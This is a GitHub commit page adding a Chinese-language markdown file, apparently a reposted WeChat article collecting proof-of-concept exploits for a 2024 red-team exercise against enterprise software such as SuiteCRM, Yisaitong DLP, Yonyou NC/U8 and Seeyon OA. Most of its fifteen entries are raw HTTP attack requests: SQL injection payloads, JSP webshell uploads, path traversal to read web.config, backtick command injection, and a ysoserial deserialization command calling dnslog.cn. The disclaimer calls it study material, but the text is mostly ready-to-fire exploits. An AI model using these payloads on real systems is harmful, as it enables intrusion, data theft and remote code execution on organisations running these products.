Skip to content

Commit

Permalink
Upload new file: 2024HW 情报合集(二)附 poc.md via simpread
Browse files Browse the repository at this point in the history
  • Loading branch information
@MrWQ
MrWQ committed Jul 25, 2024
1 parent 9fb0555 commit 6005090
Showing 1 changed file with 214 additions and 0 deletions.
214 changes: 214 additions & 0 deletions hw/2024hw/2024HW 情报合集(二)附 poc.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,214 @@
> 本文由 [简悦 SimpRead](http://ksria.com/simpread/) 转码, 原文地址 [mp.weixin.qq.com](https://mp.weixin.qq.com/s/clB6P1_DT4eMuURPMv-FBg)
**免责声明**

<table width="677"><tbody><tr><td valign="top" rowspan="5" colspan="1"><strong><strong>本文仅用于技术学习和讨论。请勿使用本文所提供的内容及相关技术从事非法活动,由于传播、利用此文所提供的内容或工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关,本次测试仅供学习使用。如有内容争议或侵权,请及时私信我们!我们会立即删除并致歉。谢谢!</strong></strong></td></tr><tr></tr><tr></tr><tr></tr><tr></tr></tbody></table>

各位大师傅不好意思,经发现下面 poc 有错,已增加和更新部分 poc。

一、SuiteCRM responseEntryPoint 存在 SQL 注入漏洞

```
GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(5);--+-&type=c&response=accept HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
```

二、亿赛通数据泄露防护 (DLP) 系统 NetSecConfigAjax 接口存在 SQL 注入漏洞

```
POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--
```

三、亿赛通数据泄露防护 (DLP) 系统 NoticeAjax 接口存在 SQL 注入漏洞

```
POST /CDGServer3/NoticeAjax;Service HTTP/1.1
Host:
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer:
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Priority: u=0, i
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
command=delNotice¬iceId=123';if(select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0: 3'--
```

四、用友 U8 Cloud MonitorServlet 存在反序列化漏洞

```
java -jar ysoserial.jar CommonsCollections6 "ping dnslog.cn" > obj.ser
POST /service/~iufo/nc.bs.framework.mx.monitor.MonitorServlet HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
payload
```

五、用友 NC 系统 blobRefClassSearch 接口中 pk_org 参数的 sql 注入漏洞

poc 暂未公布。

六、用友 NC querygoodsgridbycode 存在 SQL 注入漏洞

```
GET /ecp/productonsale/querygoodsgridbycode.json?code=1%27%29+AND+9976%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%289976%3D9976%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29--+dpxi HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Accept-Language: zh-CN,zh;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cache-Control: no-cache
```

七、通天星 CMSV6 车载定位监控平台 disable 存在 SQL 注入

```
GET /edu_security_officer/disable;downloadLogger.action?ids=1+AND+%28SELECT+ 2688+FROM+%28SELECT%28SLEEP%285%29%29%29kOIi%29 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
```

八、通天星主动安全监控云平台远程代码执行漏洞

poc 暂未公布。

九、润乾报表 InputServlet 存在任意文件上传漏洞

```
POST /InputServlet?action=12 HTTP/1.1
Host: 120.55.41.98:6868
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=00contentOboundary00
Connection: close
Content-Length: 238
--00contentOboundary00
Content-Disposition: form-data;
1024
--00contentOboundary00
Content-Disposition: form-data; /\..\\..\\..\12.jsp"
Content-Type: image/jpeg
test
--00contentOboundary00--
```

十、天问物业 ERP 系统 AreaAvatarDownLoad 存在任意文件读取漏洞

```
GET /HM/M_Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
```

十一、 致远 OA fileUpload.do 前台文件上传绕过漏洞

1、上传图片马,返回 fileid 值

```
POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUpload HTTP/1.1
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: multipart/form-data; boundary=00content0boundary00 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)
Content-Length: 754
--00content0boundary00
Content-Disposition: form-data;
--00content0boundary00
Content-Disposition: form-data;
png
--00content0boundary00
Content-Disposition: form-data;
--00content0boundary00
Content-Disposition: form-data;
--00content0boundary00
Content-Disposition: form-data;
--00content0boundary00
Content-Disposition: form-data;
--00content0boundary00
Content-Disposition: form-data;
false
--00content0boundary00
Content-Disposition: form-data; Content-Type: Content-Type: application/pdf
<% out.println("hello");%>
--00content0boundary00--
```

2、修改文件后缀为 jsp

```
POST /seeyon/autoinstall.do/../../seeyon/privilege/menu.do HTTP/1.1
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
Content-Length: 64
method=uploadMenuIcon&fileid=ID 值&filename=qwe.jsp
```

十二、福建科立讯通信 指挥调度平台 invite_one_member 存在远程命令执行漏洞

```
GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=%60ech o%20test%3Etest.txt%60 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
```

十三、福建科立讯通信 指挥调度管理平台 ajax_users.php SQL 注入漏洞

```
POST /app/ext/ajax_users.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
```

十四、福建科立讯通信 指挥调度管理平台 ajax_users.php 信息泄露漏洞

```
/app/ext/ajax_users.php
```

十五、锐捷 RG-NBS2026G-P 交换机 WEB 管理 ping.htm 未授权访问漏洞  

```
/safety/ping.htm
```

        关注公众号:**实战安全研究**

0 comments on commit 6005090

Please sign in to comment.